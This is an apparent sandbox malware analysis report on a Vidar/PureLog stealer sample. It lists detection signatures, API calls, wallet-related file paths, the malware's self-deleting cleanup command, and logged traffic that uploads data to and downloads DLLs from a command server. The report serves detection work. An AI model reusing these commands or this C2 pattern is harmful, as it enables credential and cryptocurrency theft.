Windows Analysis Report
SecuriteInfo.com.Win32.Malware-gen.198.6512.exe

Overview

General Information

Sample name: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
Analysis ID: 1447066
MD5: 3d5d6485af7cd75f9cb1284a35e70f97
SHA1: 511388b6ef0247a952580e1aaa70e6e7646e35fb
SHA256: d9598915932030d8c05825ef9d1d331cbea8cb887aa6570f96d3cec23c311411
Tags: exe, Stealc
Infos:

Detection

PureLog Stealer, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected PureLog Stealer
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Country aware sample found (crashes after keyboard check)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Opens network shares
Searches for specific processes (likely to inject)
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.Malware-gen.198.6512.exe (PID: 6580 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exe" MD5: 3D5D6485AF7CD75F9CB1284A35E70F97)
    • MSBuild.exe (PID: 6712 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
      • cmd.exe (PID: 6580 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe" & rd /s /q "C:\ProgramData\AFCBAEBAEBFH" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • WerFault.exe (PID: 7040 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6580 -s 1096 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • conhost.exe (PID: 2080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • timeout.exe (PID: 3804 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup
{"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "a2e3340f7f64008401fa5787a882af45", "Version": "9.8"}
Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe | Rule: JoeSecurity_PureLogStealer | Description: Yara detected PureLog Stealer | Author: Joe Security

Source: sslproxydump.pcap | Rule: JoeSecurity_Vidar_2 | Description: Yara detected Vidar | Author: Joe Security

Source: 00000000.00000002.1764198655.0000000003F6F000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_Vidar_1 | Description: Yara detected Vidar stealer | Author: Joe Security
Source: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_Vidar_1 | Description: Yara detected Vidar stealer | Author: Joe Security
Source: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation | Description: Detects executables containing potential Windows Defender anti-emulation checks | Author: ditekSHen | Strings:
  • 0x221f0:$s1: JohnDoe
  • 0x31f80:$s1: JohnDoe
  • 0x221e8:$s2: HAL9TH
Source: 00000000.00000002.1764198655.0000000003F0B000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_Vidar_1 | Description: Yara detected Vidar stealer | Author: Joe Security
Source: 00000000.00000002.1763723745.0000000002F96000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_Vidar_1 | Description: Yara detected Vidar stealer | Author: Joe Security

Source: 0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f3d5c0.4.raw.unpack | Rule: JoeSecurity_Vidar_1 | Description: Yara detected Vidar stealer | Author: Joe Security
Source: 0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f3d5c0.4.raw.unpack | Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation | Description: Detects executables containing potential Windows Defender anti-emulation checks | Author: ditekSHen | Strings:
  • 0x20df0:$s1: JohnDoe
  • 0x20de8:$s2: HAL9TH
Source: 0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f3d5c0.4.unpack | Rule: JoeSecurity_Vidar_1 | Description: Yara detected Vidar stealer | Author: Joe Security
Source: 0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f3d5c0.4.unpack | Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation | Description: Detects executables containing potential Windows Defender anti-emulation checks | Author: ditekSHen | Strings:
  • 0x201f0:$s1: JohnDoe
  • 0x201e8:$s2: HAL9TH
Source: 0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f6f5f0.3.unpack | Rule: JoeSecurity_Vidar_1 | Description: Yara detected Vidar stealer | Author: Joe Security

                    System Summary

                    Source: Network Connection, Author: Kiran kumar s, oscd.community: Data: DestinationIp: 23.199.218.33, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 6712, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49732
                    No Snort rule has matched

                    AV Detection

                    Source: 00000000.00000002.1764198655.0000000003F0B000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "a2e3340f7f64008401fa5787a882af45", "Version": "9.8"}
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, ReversingLabs: Detection: 34%
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, Virustotal: Detection: 38%
                    Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.0% probability
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D05DD20 CryptReleaseContext,0_2_6D05DD20
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D05DE00 CryptGenRandom,__CxxThrowException@8,0_2_6D05DE00
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D05DEE0 CryptReleaseContext,0_2_6D05DEE0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D05D9D0 CryptAcquireContextA,GetLastError,0_2_6D05D9D0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D05DBB0 CryptAcquireContextA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__CxxThrowException@8,0_2_6D05DBB0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D0835E0 CryptReleaseContext,0_2_6D0835E0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D05D7D4 CryptReleaseContext,0_2_6D05D7D4
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D05D7F0 CryptReleaseContext,0_2_6D05D7F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004062A5 CryptUnprotectData,LocalAlloc,LocalFree,1_2_004062A5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00406242 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_00406242
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004082DE memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,PK11_FreeSlot,lstrcat,1_2_004082DE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040245C memset,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,1_2_0040245C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00410DAC CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,1_2_00410DAC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC8A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,1_2_6CC8A9A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC844C0 PK11_PubEncrypt,1_2_6CC844C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC84440 PK11_PrivDecrypt,1_2_6CC84440
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC54420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,1_2_6CC54420
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCD25B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,1_2_6CCD25B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC6E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,1_2_6CC6E6E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC8A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,1_2_6CC8A650
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC68670 PK11_ExportEncryptedPrivKeyInfo,1_2_6CC68670
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCAA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,1_2_6CCAA730
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCB0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,1_2_6CCB0180
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: unknown, HTTPS traffic detected: 23.199.218.33:443 -> 192.168.2.4:49732 version: TLS 1.2
                    Source: unknown, HTTPS traffic detected: 78.47.123.174:443 -> 192.168.2.4:49734 version: TLS 1.2
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: mozglue.pdbP source: MSBuild.exe, 00000001.00000002.2060089144.000000006D09D000.00000002.00000001.01000000.0000000C.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
                    Source: Binary string: freebl3.pdb source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
                    Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/netstandard2.0/ICSharpCode.SharpZipLib.pdb source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: Binary string: nss3.pdb@ source: MSBuild.exe, 00000001.00000002.2058676901.000000006CD5F000.00000002.00000001.01000000.0000000B.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
                    Source: Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1764198655.00000000045CB000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1764198655.0000000004440000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmp, SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1767557867.0000000005610000.00000004.08000000.00040000.00000000.sdmp, Protect544cd51a.dll.0.dr
                    Source: Binary string: System.ni.pdbRSDS source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
                    Source: Binary string: mscorlib.ni.pdbRSDS source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: mozglue.pdb source: MSBuild.exe, 00000001.00000002.2060089144.000000006D09D000.00000002.00000001.01000000.0000000C.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
                    Source: Binary string: D:\a\_work\1\s\artifacts\obj\win-x86.Release\corehost\cli\apphost\standalone\Release\apphost.pdbfffGCTL source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: Binary string: C:\projects\polly\src\Polly.Net45\obj\Release\net45\Polly.pdb source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: Binary string: System.pdb source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: Microsoft.VisualBasic.pdb source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: System.Core.ni.pdb source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: System.pdbD source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: freebl3.pdbp source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
                    Source: Binary string: C:\projects\polly\src\Polly.Net45\obj\Release\net45\Polly.pdbjz source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: Binary string: mscorlib.pdb source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/netstandard2.0/ICSharpCode.SharpZipLib.pdbSHA256 source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: Binary string: D:\a\_work\1\s\artifacts\obj\win-x86.Release\corehost\cli\apphost\standalone\Release\apphost.pdb source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: Binary string: mscorlib.ni.pdb source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: System.Core.pdb< source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: System.Core.pdb source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: nss3.pdb source: MSBuild.exe, 00000001.00000002.2058676901.000000006CD5F000.00000002.00000001.01000000.0000000B.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
                    Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000001.00000002.2054205361.00000000192D8000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2048308496.000000001336C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.1.dr
                    Source: Binary string: softokn3.pdb source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
                    Source: Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1764198655.00000000044FD000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1764198655.0000000004372000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1767557867.00000000056CA000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: System.ni.pdb source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: System.Core.ni.pdbRSDS source: WER74E4.tmp.dmp.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00401162
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004162AF _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_004162AF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004153F6 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose,1_2_004153F6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040B463 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040B463
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004094E5 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_004094E5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040C679 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040C679
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00415AC2 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00415AC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00409F72 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_00409F72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00409900 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00409900
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040A981 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,1_2_0040A981
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00415E66 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,1_2_00415E66
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00415843 _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,1_2_00415843
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

                    Networking

                    Source: Malware configuration extractor, URLs: https://steamcommunity.com/profiles/76561199689717899
                    Source: global traffic, HTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1 | Host: steamcommunity.com | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: Joe Sandbox View, IP Address: 78.47.123.174
                    Source: Joe Sandbox View, ASN Name: AKAMAI-ASUS
                    Source: Joe Sandbox View, JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                    Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 | Host: 78.47.123.174 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic, HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----IIECFHDBAAECAAKFHDHI | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 | Host: 78.47.123.174 | Content-Length: 279 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic, HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCB | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 | Host: 78.47.123.174 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic, HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----KEBGHCBAEGDHIDGCBAEC | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 | Host: 78.47.123.174 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic, HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----DAAFBAKECAEGCBFIEGDG | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 | Host: 78.47.123.174 | Content-Length: 332 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic, HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----DGCAAFBFBKFIDGDHJDBK | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 | Host: 78.47.123.174 | Content-Length: 6381 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic, HTTP traffic detected: GET /sqls.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 | Host: 78.47.123.174 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic, HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----ECGIIIDAKJDHJKFHIEBF | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 | Host: 78.47.123.174 | Content-Length: 4677 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic, HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----HIDHDGDHJEGHIDGDHCGC | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 | Host: 78.47.123.174 | Content-Length: 1529 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic, HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----HDAAAAFIIJDBGDGCGDAK | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 | Host: 78.47.123.174 | Content-Length: 437 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic, HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----FIJECAEHJJJKJKFIDGCB | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 | Host: 78.47.123.174 | Content-Length: 437 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic, HTTP traffic detected: GET /freebl3.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 | Host: 78.47.123.174 | Cache-Control: no-cache
